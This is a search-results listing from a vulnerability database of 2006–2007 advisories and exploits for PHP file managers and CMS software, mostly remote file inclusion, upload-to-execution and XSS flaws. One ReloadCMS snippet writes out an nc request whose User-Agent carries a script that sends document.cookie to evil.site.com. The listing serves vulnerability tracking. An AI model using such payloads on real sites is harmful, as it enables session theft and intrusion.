Lucene search
K

733 matches found

Prion
Prion
added 2007/01/16 11:28 p.m.20 views

Code injection

Unspecified vulnerability in easy-content filemanager allows remote attackers to upload or modify arbitrary files via unspecified vectors...

7.5CVSS7.3AI score0.01187EPSS
Exploits0References2
Cvelist
Cvelist
added 2007/01/16 11:0 p.m.23 views

CVE-2007-0252

Unspecified vulnerability in easy-content filemanager allows remote attackers to upload or modify arbitrary files via unspecified vectors...

6.9AI score0.01187EPSS
Exploits0References2
CVE
CVE
added 2007/01/16 11:0 p.m.65 views

CVE-2007-0252

Technical details (affected product/version, vectors, exploitability) are not provided in the supplied documents. Monitor for updates; no public details are available here.

7.5CVSS6.9AI score0.01187EPSS
Exploits0References2Affected Software1
seebug.org
seebug.org
added 2006/12/06 12:0 a.m.29 views

Knusperleicht FileManager DWL_Download远程文件包含漏洞

Knusperleicht FileManager是一款基于PHP的音乐管理程序。 Knusperleicht FileManager不正确过滤用户提交的URI数据,远程攻击者可以利用漏洞以WEB进程权限执行任意命令。 问题是脚本对用户提交的"dwldownloadpat"和"dwlincludepath"参数缺少过滤,提交恶意的远程服务器作为包含对象,可导致以WEB进程权限执行任意PHP代码。 Knusperleicht FileManager http://knusperleicht.at/index.php?knuspi=phpecke...

7.1AI score
Exploits0
Exploit DB
Exploit DB
added 2006/09/16 12:0 a.m.53 views

UNAK-CMS 1.5 - 'dirroot' Remote File Inclusion

============================================================================================== UNAK-CMS = v1.5 dirroot Remote File Inclusion Exploit =============================================================================================== Critical Level : Dangerous Venedor site :...

7AI score
Exploits0
Packet Storm
Packet Storm
added 2006/08/17 12:0 a.m.24 views

filemanagerrem.txt

Kurdish Security FileManager Remote Command Execution Freedom For Ocalan Contact : irc.gigachat.net kurdhack & www.PatrioticHackers.com Rish : High Class : Remote Script : FileManager Site : http://www.knusperleicht.at Code : $dwldownloadpath = "downloads"; $dwlincludepath = "dwl/";...

7.4AI score
Exploits0
Packet Storm
Packet Storm
added 2006/08/17 12:0 a.m.29 views

quickie.txt

Kurdish Security Quickie Remote Command Execution Freedom For Ocalan Contact : irc.gigachat.net kurdhack & www.PatrioticHackers.com Rish : High Class : Remote Script : Kurdish Security FileManager Remote Command Execution Freedom For Ocalan Contact : irc.gigachat.net kurdhack &...

7.4AI score
Exploits0
NVD
NVD
added 2006/08/05 12:4 a.m.14 views

CVE-2006-3987

Multiple PHP remote file inclusion vulnerabilities in index.php in Knusperleicht FileManager 1.2 and earlier allow remote attackers to execute arbitrary PHP code via a URL in the 1 dwldownloadpath or 2 dwlincludepath parameters...

5.1CVSS7.7AI score0.03122EPSS
Exploits1References7
Cvelist
Cvelist
added 2006/08/05 12:0 a.m.17 views

CVE-2006-3987

Multiple PHP remote file inclusion vulnerabilities in index.php in Knusperleicht FileManager 1.2 and earlier allow remote attackers to execute arbitrary PHP code via a URL in the 1 dwldownloadpath or 2 dwlincludepath parameters...

7.7AI score0.03122EPSS
Exploits1References7
CVE
CVE
added 2006/08/05 12:0 a.m.37 views

CVE-2006-3987

The CVE-2006-3987 entries describe multiple PHP remote file inclusion vulnerabilities in Knusperleicht FileManager 1.2 and earlier. The issue arises in index.php where an attacker can supply a URL in the dwl_download_path or dwl_include_path parameters, enabling remote code execution. Connected d...

5.1CVSS8AI score0.03122EPSS
Exploits1References7Affected Software1
securityvulns
securityvulns
added 2006/08/02 12:0 a.m.30 views

[Kurdish Security # 20 ] Quickie Remote Command Execution

Kurdish Security Quickie Remote Command Execution Freedom For Ocalan Contact : irc.gigachat.net kurdhack & www.PatrioticHackers.com Rish : High Class : Remote Script : Kurdish Security FileManager Remote Command Execution Freedom For Ocalan Contact : irc.gigachat.net kurdhack &...

0.6AI score
Exploits0
Packet Storm
Packet Storm
added 2006/07/20 12:0 a.m.39 views

plesk800.txt

Product: Plesk control panel Version: alert; Credits INVENT...

7.4AI score
Exploits0
CVE
CVE
added 2006/07/19 11:0 p.m.48 views

CVE-2006-3737

CVE-2006-3737 describes a cross-site scripting (XSS) vulnerability in the filemanager/filemanager.php component of the SWsoft Plesk control panel (version 8.0 and earlier). The issue arises when an authenticated user supplies a crafted file parameter, allowing injection of arbitrary web script or...

4.3CVSS5.5AI score0.01196EPSS
Exploits1References5Affected Software1
Exploit DB
Exploit DB
added 2006/04/02 12:0 a.m.27 views

ReloadCMS 1.2.5 - Cross-Site Scripting / Remote Code Execution

nc target.host.com 80 GET /pathtoreloadcms/ HTTP/1.0 User-Agent: "window.open"http://evil.site.com/grab.php?c="+document.cookie+"&ref="+document.URL;window.close; Host: target.host.com Connection: Close So, when admin see site statistics through the administration panel, javascript will run Once...

7AI score
Exploits0
Prion
Prion
added 2006/03/23 11:6 p.m.21 views

Design/Logic Flaw

Laurentiu Matei eXpandable Home Page XHP CMS 0.5 and earlier allows remote authenticated users to use the HTMLArea FileManager plugin to upload and execute arbitrary PHP files using 1 manager.php, 2 standalonemanager.php, and 3 images.php...

9CVSS7.6AI score0.09395EPSS
Exploits1References9Affected Software1
NVD
NVD
added 2006/03/23 11:6 p.m.25 views

CVE-2006-1371

Laurentiu Matei eXpandable Home Page XHP CMS 0.5 and earlier allows remote authenticated users to use the HTMLArea FileManager plugin to upload and execute arbitrary PHP files using 1 manager.php, 2 standalonemanager.php, and 3 images.php...

9CVSS7.1AI score0.09395EPSS
Exploits1References9
CVE
CVE
added 2006/03/23 11:0 p.m.56 views

CVE-2006-1371

CVE-2006-1371 affects XHP CMS

9CVSS7AI score0.09395EPSS
Exploits1References9Affected Software1
Cvelist
Cvelist
added 2006/03/23 11:0 p.m.27 views

CVE-2006-1371

Laurentiu Matei eXpandable Home Page XHP CMS 0.5 and earlier allows remote authenticated users to use the HTMLArea FileManager plugin to upload and execute arbitrary PHP files using 1 manager.php, 2 standalonemanager.php, and 3 images.php...

7AI score0.09395EPSS
Exploits1References9
exploitpack
exploitpack
added 2006/03/22 12:0 a.m.25 views

XHP CMS 0.5 - upload Remote Command Execution

XHP CMS 0.5 - upload Remote Command Execution !/usr/bin/php -q -d shortopentag=on 126 $re...

0.3AI score
Exploits0
0day.today
0day.today
added 2006/03/22 12:0 a.m.69 views

XHP CMS <= 0.5 (upload) Remote Command Execution Exploit

Exploit for unknown platform in category web applications ======================================================== XHP CMS = 0.5 upload Remote Command Execution Exploit ======================================================== !/usr/bin/php -q -d shortopentag=on ? echo "XHP CMS = 0.5 remote cmmnds...

7.1AI score
Exploits0
Rows per page
Query Builder